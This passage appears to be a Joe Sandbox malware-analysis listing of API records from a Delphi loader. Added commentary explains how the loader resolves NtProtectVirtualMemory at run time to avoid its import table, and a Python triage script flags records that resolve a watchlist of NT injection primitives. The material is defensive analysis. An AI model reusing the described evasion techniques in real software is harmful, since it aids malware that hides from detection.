                                                                              • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                              • Instruction ID: 80b04a7ab5ac186b2a27d509d96c5b063dd06cd5e42aa6498e0b15ce38233bc2
                                                                              • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                              • Instruction Fuzzy Hash: 47A022AC0003030ACF0B332E000002A20BF3FE03003CEC0E802008A0008F3A8000AE30
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02981A03,?,02982000), ref: 029815E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: e6d9ff02c8b863b45e5b6074b9c177880f6e408d3bed93eb027b5b321be6f2f7
                                                                              • Instruction ID: a340b22a850b2ad320312c6e12d173257ec624a41b1352de63ffdcbfb3dc9fa1
                                                                              • Opcode Fuzzy Hash: e6d9ff02c8b863b45e5b6074b9c177880f6e408d3bed93eb027b5b321be6f2f7
                                                                              • Instruction Fuzzy Hash: EFF049F0B463004FDB09DFB99A803117BE6E78A344F148579D609DB388E77184429F00
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02982000), ref: 029816A4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: b14afdbafe8d72a55af21424f4dafff29b2d1ce769e23b7f39bfcbaadf2a4207
                                                                              • Instruction ID: 17ef8bfbdf19439b3c20df1d54780de6caf017666dc6bf584b5a0e5e48850a2f
                                                                              • Opcode Fuzzy Hash: b14afdbafe8d72a55af21424f4dafff29b2d1ce769e23b7f39bfcbaadf2a4207
                                                                              • Instruction Fuzzy Hash: B8F0B4B2B457996BD7109F5EAC80792BB98FB40314F054139F94CD7340D770A8518B94
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02981704
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: bca122f2631e3993f14be9634c51fc80b08a124397e2eaa00034da1861fde48d
                                                                              • Instruction ID: 69b3abb09badf25878d96871f5c87caddbb192c878394ac80575d963e8fea21b
                                                                              • Opcode Fuzzy Hash: bca122f2631e3993f14be9634c51fc80b08a124397e2eaa00034da1861fde48d
                                                                              • Instruction Fuzzy Hash: 1DE0CD75300301AFD7106F7D5D407527BDCEF84654F1C4879F549DB241D260E8118B64
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0299A17F,?,?,0299A211,00000000,0299A2ED), ref: 02999F0C
                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999F24
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999F36
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999F48
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999F5A
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999F6C
                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999F7E
                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999F90
                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999FA2
                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999FB4
                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999FC6
                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999FD8
                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999FEA
                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999FFC
                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0299A00E
                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0299A020
                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0299A032
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                              • API String ID: 667068680-597814768
                                                                              • Opcode ID: 30a051de223c3fca1af3f684ceb5da9762363595ae4ee0c5b9e2797f1a5dc987
                                                                              • Instruction ID: d2231c72ebc83506ffff230abe71e8245e4f8b4fe5879e6df76cbc45999a2061
                                                                              • Opcode Fuzzy Hash: 30a051de223c3fca1af3f684ceb5da9762363595ae4ee0c5b9e2797f1a5dc987
                                                                              • Instruction Fuzzy Hash: AC3128B0E85350EFEF10EFF8D88AA6677ADEB8A710B040965A414CF244D679D890DF52
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,02986BD8,02980000,029AB790), ref: 029858D1
                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029858E8
                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 02985918
                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 0298597C
                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859B2
                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859C5
                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859D7
                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859E3
                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000), ref: 02985A17
                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8), ref: 02985A23
                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02985A45
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                              • API String ID: 3245196872-1565342463
                                                                              • Opcode ID: 2896edd83e4979fa46b169b4942cc27a277d6653109ee5c3ab657636e6d943b4
                                                                              • Instruction ID: 7084db0e54cabd6bb7f140dc1165b7df4254e2f5a0a219d1a5e3d8743d6749eb
                                                                              • Opcode Fuzzy Hash: 2896edd83e4979fa46b169b4942cc27a277d6653109ee5c3ab657636e6d943b4
                                                                              • Instruction Fuzzy Hash: 6B416D71D00259AFDF10EAE8CCC8AEEB3BDAB48350F4A45A5A158E7241E770DE49CF54
                                                                              APIs
                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02985B94
                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02985BA1
                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02985BA7
                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02985BD2
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C19
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C29
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C51
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C61
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02985C87
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02985C97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                              • API String ID: 1599918012-2375825460
                                                                              • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                              • Instruction ID: 0f6741a223ba8fe6e5665b4d2b2a71df44d85da3974b0b3ec0578d74ecb410e2
                                                                              • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                              • Instruction Fuzzy Hash: 13318671E4021C3AFF25EAB8DC85FEF77AD5B44380F4A41E19608E6185DB749E888F91
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 029979E5
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029979EB
                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02997A09
                                                                              Strings
                                                                              • NtProtectVirtualMemory, xrefs: 029979DB
                                                                              • C:\Windows\System32\ntdll.dll, xrefs: 029979E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleMemoryModuleProcProtectVirtual
                                                                              • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                              • API String ID: 1550029230-1386159242
                                                                              • Opcode ID: df666a2a35c0016945302da9f3bbfac7f695765a557096eaa1ae750a9f89f02c
                                                                              • Instruction ID: 8e020f7c3fe391f04980fe017804de512ca5a26c11f95137509acf9c857f0232
                                                                              • Opcode Fuzzy Hash: df666a2a35c0016945302da9f3bbfac7f695765a557096eaa1ae750a9f89f02c
                                                                              • Instruction Fuzzy Hash: EDE0B6B6691208AF9B40EEDCEC45DDBB7ECAB58220B004801BE19DB200C630E9619FB4
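The function above does not import VirtualProtect; it looks up ntdll.dll, fetches NtProtectVirtualMemory by name and calls it directly, so the primitive that changes page protections during unpacking never appears in the static import table. Two things matter when reading such records: the argument columns are stack values recovered statically by the IDA plugin and are not reliable (here the GetProcAddress line shows the ntdll path where the procedure name should be, while the Strings xrefs carry the real name), and the "Memory Dump Source" line terminates each record. The Python below is an added example, not code from the analysed sample or from Joe Sandbox: it parses records in the bullet format used on this page, takes candidate import names from the Strings xrefs and from every argument token regardless of position, and reports functions that resolve a watchlisted NT memory primitive at run time. The record format is inferred from this listing and the watchlist is my own choice; the sample input copies bullets from three records of this report.

```python
"""Added example: scripted triage of Joe Sandbox function records.

Not code from the analysed sample or from Joe Sandbox. The record format is
inferred from the "APIs" / "Strings" bullets in this report and the watchlist
of NT memory primitives is my own choice, not something the report defines."""
import re
from collections import namedtuple

# Constructed input: bullets copied from three function records in this report
# (the lstrcpyn helper at 029859E3, the Delphi locale loader at 02985B94 and the
# NtProtectVirtualMemory stub at 029979E5). "Memory Dump Source" ends a record.
SAMPLE_RECORDS = r"""
APIs
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859E3
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000), ref: 02985A17
Memory Dump Source
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02985B94
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C29
Memory Dump Source
APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 029979E5
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029979EB
• NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02997A09
Strings
• NtProtectVirtualMemory, xrefs: 029979DB
• C:\Windows\System32\ntdll.dll, xrefs: 029979E0
Memory Dump Source
"""

# "• Name.MODULE(args), ref: ADDR" and "• text, xrefs: ADDR"
API_RE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
STR_RE = re.compile(r"^• (.*?), xrefs: ([0-9A-Fa-f]+)$")

Record = namedtuple("Record", "apis strings")   # apis: [(name, module, args, ref)]


def parse_records(text):
    """Split report text into per-function records."""
    records, apis, strings = [], [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            if apis or strings:
                records.append(Record(apis, strings))
            apis, strings = [], []
            continue
        m = API_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            apis.append((name, module, [a.strip() for a in args.split(",")], ref))
            continue
        m = STR_RE.match(line)
        if m:
            strings.append(m.group(1))
    if apis or strings:
        records.append(Record(apis, strings))
    return records


# Constructed watchlist: NT primitives a loader resolves by name when it wants to
# change page protections or inject without importing the Win32 wrappers.
NT_MEMORY_APIS = {
    "NtProtectVirtualMemory", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
    "NtMapViewOfSection", "NtUnmapViewOfSection", "NtCreateSection",
    "NtCreateThreadEx", "NtQueueApcThread", "NtResumeThread",
}


def triage(text):
    """One finding per record that resolves a watchlisted NT API at run time."""
    findings = []
    for rec in parse_records(text):
        if "GetProcAddress" not in {name for name, _, _, _ in rec.apis}:
            continue
        # Candidate names come from the Strings xrefs and from every argument
        # token; argument positions are stale stack values and are not trusted.
        tokens = set(rec.strings)
        for _, _, args, _ in rec.apis:
            tokens.update(args)
        resolved = sorted(tokens & NT_MEMORY_APIS)
        if not resolved:
            continue
        direct = sorted(name for name, module, _, _ in rec.apis
                        if module == "NTDLL" and name in NT_MEMORY_APIS)
        findings.append({
            "ref": rec.apis[0][3],          # address of the record's first API call
            "resolved": resolved,           # names fetched through GetProcAddress
            "direct_ntdll_calls": direct,   # and then called straight into ntdll
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

Run against the three copied records, only the stub at 029979E5 is reported, with NtProtectVirtualMemory both resolved and called directly into NTDLL; the Delphi locale loader calls LoadLibraryExA but never GetProcAddress, so it is skipped. Feeding the whole function listing of a report through `triage` gives a short list of addresses to open first in the disassembler.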
                                                                              APIs
                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02987F85
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1705453755-0
                                                                              • Opcode ID: 8665c927c96c32c4f1226cbe601850ed587083270b8ad2943d0e18c1f55c7465
                                                                              • Instruction ID: a92c616a1875227a1be378ab0bede5874df8a281a62ed84173704fa371d341f7
                                                                              • Opcode Fuzzy Hash: 8665c927c96c32c4f1226cbe601850ed587083270b8ad2943d0e18c1f55c7465
                                                                              • Instruction Fuzzy Hash: 2B11C0B5A00209AFDB04DF99C8819AFF7F9EFC8704B14C569A515EB254E6719A018B90
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A772
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: fd44b84397e343e6ab0a03f6b01e748795d4be2baad4aacefe5b0ce7905c0c2f
                                                                              • Instruction ID: c6a59d6b3e1aee38729971fa6ed4c2c1613e3aa9798d99d7b5bd723d5b38a329
                                                                              • Opcode Fuzzy Hash: fd44b84397e343e6ab0a03f6b01e748795d4be2baad4aacefe5b0ce7905c0c2f
                                                                              • Instruction Fuzzy Hash: B8E0D835B0021417D711B5689C80AFA739D9B9C310F08427FBD09C7340FDA09D444AE8
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,029AA106,00000000,029AA11E), ref: 0298B72A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: 7cfe5c6d4333f3a438200bae834ca6818d8ae3774282adc9cf38efa2ac163ece
                                                                              • Instruction ID: 39efe9f5eedddd2232ab406856d0a4d2ca31e90da684cb2c81f01bb9648cb186
                                                                              • Opcode Fuzzy Hash: 7cfe5c6d4333f3a438200bae834ca6818d8ae3774282adc9cf38efa2ac163ece
                                                                              • Instruction Fuzzy Hash: 93F0B7749483019FC350EF28D56062577E5FF9A758F08492DE899C7B80D77498148FD6
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0298BE02,00000000,0298C01B,?,?,00000000,00000000), ref: 0298A7B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                              • Instruction ID: 16c484f28786049d8d01741f58f35c0022c7df526ee1f4b38650070e68a251ac
                                                                              • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                              • Instruction Fuzzy Hash: 5DD05E6630E2A02AA320A15A2D84D7B5AECCBC5BA1F08483EB588CA240D2048C06A6B1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID:
                                                                              • API String ID: 481472006-0
                                                                              • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                              • Instruction ID: 8973fb8f9f40c206c315462732d764627234d3418b2e0c3d9af411d7357c1b34
                                                                              • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                              • Instruction Fuzzy Hash: 23A011008088200282803B280C0223A3088A880A20FC80B80A8F8883E0EA2E022080E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.00000000029DF000.00000040.00001000.00020000.00000000.sdmp, Offset: 029DF000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_29df000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                                              • Instruction ID: e214295b515d9b4b4d7bf215d238bbaac53a4cb834b1bc75c2fdc2e4fcfd3c41
                                                                              • Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                                              • Instruction Fuzzy Hash: 91F058322142518FD621CE59C8C2B59F3ACEF407E8F2B89AAE54297951C328E844EA50
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0298D22D
                                                                                • Part of subcall function 0298D1F8: GetProcAddress.KERNEL32(00000000), ref: 0298D211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                              • API String ID: 1646373207-1918263038
                                                                              • Opcode ID: 2ad6428e7c5be5ae6e04227af8369b988aa5758e82b15ae6fe3cb92496691988
                                                                              • Instruction ID: 5f73a661439f9bb570ac234ed9b3ea68444e9db1c90760d17da6bd73a9b3536a
                                                                              • Opcode Fuzzy Hash: 2ad6428e7c5be5ae6e04227af8369b988aa5758e82b15ae6fe3cb92496691988
                                                                              • Instruction Fuzzy Hash: 5F418DA2A893485B920C7BBD7400977B7DEDB887643A8441BF518CB7C4EE30BC915B79
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02996E6E
                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02996E7F
                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02996E8F
                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02996E9F
                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02996EAF
                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02996EBF
                                                                              • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02996ECF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                              • API String ID: 667068680-2233174745
                                                                              • Opcode ID: dc4624901f175c45985a31e8c27799ca8072e5687d6f0b5837eeef57ce970938
                                                                              • Instruction ID: e28ec3705321674ff199e107be358aa65ae361a3486713f58af2cbf7d644175b
                                                                              • Opcode Fuzzy Hash: dc4624901f175c45985a31e8c27799ca8072e5687d6f0b5837eeef57ce970938
                                                                              • Instruction Fuzzy Hash: CFF057F1A8D345AEB7007F789CAED372BDD9DE0718714182D74175D542DA75C8204FA0
                                                                              APIs
                                                                              • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 0299A3DC
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0299A3F3
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 0299A3F9
                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0299A40B
                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 0299A487
                                                                              • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 0299A493
                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0299A4A7
                                                                              Strings
                                                                              • LoadLibraryExA, xrefs: 0299A3E9
                                                                              • C:\Windows\System32\KernelBase.dll, xrefs: 0299A3EE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Read$AddressHandleLibraryLoadModuleProc
